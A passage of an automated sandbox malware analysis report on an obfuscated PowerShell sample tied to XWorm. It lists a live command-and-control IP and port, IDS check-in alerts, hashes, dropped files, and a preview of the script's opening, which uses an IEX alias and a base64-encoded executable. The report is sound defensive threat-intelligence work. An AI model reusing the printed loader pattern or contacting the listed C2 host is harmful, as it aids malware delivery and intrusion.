https://contoso.com/Icon | powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.0.dr | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.228 | unknown | Russian Federation | 49505 | SELECTELRU | true
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1599699
                                    Start date and time:2025-01-26 10:33:11 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 15s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:b.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@7/14@0/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 9
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.168.117.173, 40.126.32.74, 13.107.246.45, 20.109.210.53, 20.190.159.4
                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target RegSvcs.exe, PID 6568 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 3716 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
04:34:11 | API Interceptor | 41x Sleep call for process: powershell.exe modified
04:34:15 | API Interceptor | 8536502x Sleep call for process: RegSvcs.exe modified
04:34:35 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
04:37:46 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.113.115.228 | Wn0FGQ53RW.ps1 | malicious | XWorm |
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
SELECTELRU | Wn0FGQ53RW.ps1 | malicious | XWorm | 176.113.115.228
SELECTELRU | steel.exe | malicious | Socks5Systemz | 176.113.115.96
SELECTELRU | steel.exe | malicious | Socks5Systemz | 176.113.115.96
SELECTELRU | 3MJRZ0IzVh.exe | malicious | LummaC Stealer | 176.113.115.37
SELECTELRU | http://uea.uz/water/index.htm | malicious | Unknown | 92.53.68.16
SELECTELRU | https://goo.su/eR7m9Bb | malicious | Unknown | 31.184.215.132
SELECTELRU | random.exe | malicious | Amadey, Babadeda, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 176.113.115.163
SELECTELRU | armv7l.elf | malicious | Gafgyt, Mirai | 94.154.35.238
SELECTELRU | armv4l.elf | malicious | Gafgyt, Mirai | 94.154.35.238
SELECTELRU | i686.elf | malicious | Gafgyt, Mirai | 94.154.35.238
No context
No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1749288364721844
                                      Encrypted:false
                                      SSDEEP:192:CrHEOLEk8Qcsy/0BU/Sa6THy8WkmzuiFNZ24IO8aX:+RL+Q/ZBU/SaWS/9zuiFNY4IO8a
                                      MD5:E45700890495370F74E7C5C54F9A3014
                                      SHA1:20DA3A802629B4A72AAADB7FE97AF3CF1E422841
                                      SHA-256:EEFF8FFD4BBB5171B813499D51DCF2A76C284124A71C7F60E11C31802C5EFB10
                                      SHA-512:FC61D41F00555434E38CEA2243B1552F292A29409B37C57104E650B67EBA4C5D216DFA9CF1FDA94708F9A67929AE1612B4CB9E930B05C241468B77E49F9582BD
                                      Malicious:false
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.3.5.7.8.6.4.0.6.5.2.7.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.3.5.7.8.6.4.6.2.7.7.7.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.d.6.8.a.b.9.-.4.3.7.d.-.4.0.1.b.-.b.b.d.0.-.4.4.b.9.4.3.2.4.c.1.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.0.c.d.d.9.3.-.6.d.f.c.-.4.9.1.5.-.9.4.a.6.-.c.9.5.4.4.0.0.6.4.9.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.8.-.0.0.0.1.-.0.0.1.4.-.6.2.e.0.-.1.4.7.5.d.5.6.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.
                                      Process:C:\Windows\System32\wermgr.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.5318512986567241
                                      Encrypted:false
                                      SSDEEP:96:8B2FajaIhrxYid6zRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAfFf/VXTT:3yaIhmG6zR30mYAzuiFtZ24lO8
                                      MD5:FEDF4338E94A280DF54F3D727CD7FAD0
                                      SHA1:825D6A39B56FC46507230088622C81B3978E93F1
                                      SHA-256:5C2BA8ED78B235D841143ACC9F339D357ABCDFE6C03E7E3761007F8AA083FB1B
                                      SHA-512:F5EA95DC6E241E5D1C86F101760EAC1E1849C988B2644243B35FB6AFB4819F16058CC18A87066CF457823B9572FD3790AC5D18F1FD302220EAF821C4C065D7EC
                                      Malicious:false
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.3.5.7.7.1.8.0.8.0.2.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.3.5.7.6.5.2.5.1.1.1.6.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.a.4.c.a.8.b.-.3.3.e.4.-.4.7.5.b.-.8.4.8.2.-.0.e.9.6.7.6.9.8.7.0.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.4.-.0.0.0.1.-.0.0.1.4.-.9.9.5.f.-.7.1.7.3.d.5.6.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                      Process:C:\Windows\System32\wermgr.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):7288
                                      Entropy (8bit):3.731107745118637
                                      Encrypted:false
                                      SSDEEP:96:RSIU6o7wVetbrpQjW6YEc7ariyM6gmfHNpXEr/BA5aMANm:R6l7wVeJrp/6YEIariypgmftECpANm
                                      MD5:76513552889CE39896431C583A62D1E2
                                      SHA1:A172FB40B67B7F0CC5113AB0416B201862964C05
                                      SHA-256:D5CAFCAC03DDA2E1E72B5FA77148D0519CD230FC4EFFAE8527A028E4A3A32A17
                                      SHA-512:4BC9D5A403396EF3BBB400B3ECF54840D36076FB99B815E145032468A3B8AC8C54148B54F63D0B28CD82B48902F58A94CC6C23281042667DC14E8196BD9B195D
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.1.6.<./.P.i.
                                      Process:C:\Windows\System32\wermgr.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4905
                                      Entropy (8bit):4.692638124385983
                                      Encrypted:false
                                      SSDEEP:96:uIjf0I7OCa7VBJFKloFMMFh+pjWTzFMMFgufnd:uIIYOj7h45Coufd
                                      MD5:D751F58A10422CCFF75C786CA27AA9CD
                                      SHA1:509CAFC55A43ED49F36F1565F2A22D218BDC00BD
                                      SHA-256:4D593C2AC31AB669904EC4BFE57317F2858C23182E0B61E6363453DDC49FC494
                                      SHA-512:D8708CFDE51B0E605BC71EBDC383B0DD2679590ED8294DB7F18587B080C48201C2E6A90904E74AF084BEDA72AF7C01005DB510799595E6F1395D6DEE84901D1B
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="692676" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Sun Jan 26 09:37:44 2025, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):330087
                                      Entropy (8bit):3.5427843741165983
                                      Encrypted:false
                                      SSDEEP:6144:brXZw4jvGjVdQTgG6atJRAyR2GlvSQj4SqY:brtvG8TioU5S9
                                      MD5:7004B2F7C7D7743CA692AC3024B352DC
                                      SHA1:19B9319DCB490318CAE2F54AD1E5A20FF8E26B9E
                                      SHA-256:9F170C35280D1B63C299AEBF24B5ABBD48E01D7C892FC56CB389EB5629F0700D
                                      SHA-512:2B39D36062C4BE8726D59E9C4BEBA2570606E9733AB0597D328931B0D4A0A33C91461588CE96816C10F734241B83A3D55197F6477F3D8ED7C4A176F95165D50C
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP..a..... .......h..g........................ ...........$...8'.......&..(b..........`.......8...........T...........0?..7...........\'..........H)..............................................................................eJ.......)......GenuineIntel............T..............g....z........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8356
                                      Entropy (8bit):3.68818233754692
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJ5b6g8Q6YxGvSkQgmfZ4Aprk89b3GsfgH39m:R6lXJV6gj6Y2S7gmfSs3lfgQ
                                      MD5:09A9BB87F5C9A9B9292F864545B6AB61
                                      SHA1:C790622211946D363A0EA7527E8281B35CB811F7
                                      SHA-256:E15CEE739696E94B48C32E096740A18FDA88E33427749BAA1B12CBDDE6FDB2A1
                                      SHA-512:9AF2604C9602876914EEF80F8A8B78A467D8D0731570E10CA0DB094716035A5896B376934EBE5A20BEB6E47A4EB385414F20293BA829BC8F3D8695DA046A207C
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.8.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4726
                                      Entropy (8bit):4.442737188860243
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsLJg77aI9FCrWpW8VYBYm8M4J+VFo+q8v5kmDIDd:uIjflI7vCa7VZJ/KSmDIDd
                                      MD5:3A3AAFAC7F6E0647CEAEF017769F7FC6
                                      SHA1:C57B29A01101B2088D4CF8B631B9546FF79CCFFE
                                      SHA-256:676E87C60B56AC054632732E9CBDCE728C155F30E88D1C9CD875CAB1AC01764D
                                      SHA-512:8149154B9551FE8C33374335FA454BEDDE1503125B74BA84CEF24A7BC2C7F6E442F71C927EC2E29A69195980A186558D380FF1B099D723CEDE0EC57A0E09F97F
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="692680" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):11608
                                      Entropy (8bit):4.890472898059848
                                      Encrypted:false
                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                      Malicious:false
                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulJnp/p:NllU
                                      MD5:BC6DB77EB243BF62DC31267706650173
                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                      Malicious:false
                                      Preview:@...e.................................X..............@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6222
                                      Entropy (8bit):3.694767108166484
                                      Encrypted:false
                                      SSDEEP:96:smkCUohGkvhkvCCtRHYkTZdH+HYkTZCFHR:smgjRHYkWHYkO
                                      MD5:E09E8E4F52892C518EAEDF3035CDF08E
                                      SHA1:25927B618B9DFCFE71114919D9DDA355282D46AE
                                      SHA-256:7442DE644641FB92CCE879EF2FA52A8024F45394042B881C4A53C7DB9E556529
                                      SHA-512:974B8F2D443321242BB132E876A6EB812BE562F72DC8D6C886DDC739DDC325AB4387B65142D81DAECCF0A95C7553EAB8B2914B990214261FEE0278EF09EE08CF
                                      Malicious:false
                                      Preview:...................................FL..................F.".. ...d........s.o..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........n.o...o.s.o......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Z=L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:ZAL..Roaming.@......DWSl:ZAL....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Z=L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSl:Z=L....E......................G..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Z=L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Z=L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:ZEL....q...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.425858083576356
                                      Encrypted:false
                                      SSDEEP:6144:4Svfpi6ceLP/9skLmb0OTlWSPHaJG8nAgeMZMMhA2fX4WABlEnNX0uhiTw:DvloTlW+EZMM6DFy103w
                                      MD5:5C62D2A5872D1008568312556F88F772
                                      SHA1:5971CC9F1AAAB81B284C5F5E945F7527273FFD38
                                      SHA-256:D771BA9B6410D4183099D9CDC4AB33FDFD74D0E110AF4F47024E3D02E89F3900
                                      SHA-512:D2FC6314530860521EAEB3D17BE7C6EC9F690D13569B4E15166DB059F401098CDA3793DA5EAD10219E6CAEAF9E67CB7D042B62E8310E05ECB748C16559358919
                                      Malicious:false
                                      Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ5.u.o..............................................................................................................................................................................................................................................................................................................................................)..A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:ASCII text, with very long lines (65481), with CRLF line terminators
                                      Entropy (8bit):5.2108360392533335
                                      TrID:
                                        File name:b.ps1
                                        File size:185'580 bytes
                                        MD5:b5008db49b4ac5e668451b9a34ce2b76
                                        SHA1:820ebe8c35bf4c57e1e439e4b10cee8186c444d3
                                        SHA256:7367d1b56aca0b585cef8466d8d9a83dac03f0e6d81f9e89567c10a2cc44a4bc
                                        SHA512:43e8929ec5f728ee53f9a2b378f1949a789ac1e0a92fea559541444b39a3ca8da9911751bda6d37d30831f60af8b0356c4294b695de303cdd076c7c9b550c754
                                        SSDEEP:3072:ZcUKZ20H5qt7ABLmYOlba6c5GdOa7MQrq3v0ayW3sfc4xDAmMz/zlZVdtj0QGTgn:ZcB20H5qt7ABLmYOlba6c5GdOa7MQrq/
                                        TLSH:CA047C321102BC8E9F7F3E48A5042D911CDC3877AB69C158FAC60AAD75EA650DF39DB4
                                        File Content Preview:.... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA
                                        Icon Hash:3270d6baae77db44


                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                        2025-01-26T10:34:28.544276+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:34:28.769948+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:34:28.814226+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:34:36.918088+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:34:36.918088+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:34:40.555436+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:34:40.558655+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:34:52.350845+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:34:52.357325+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
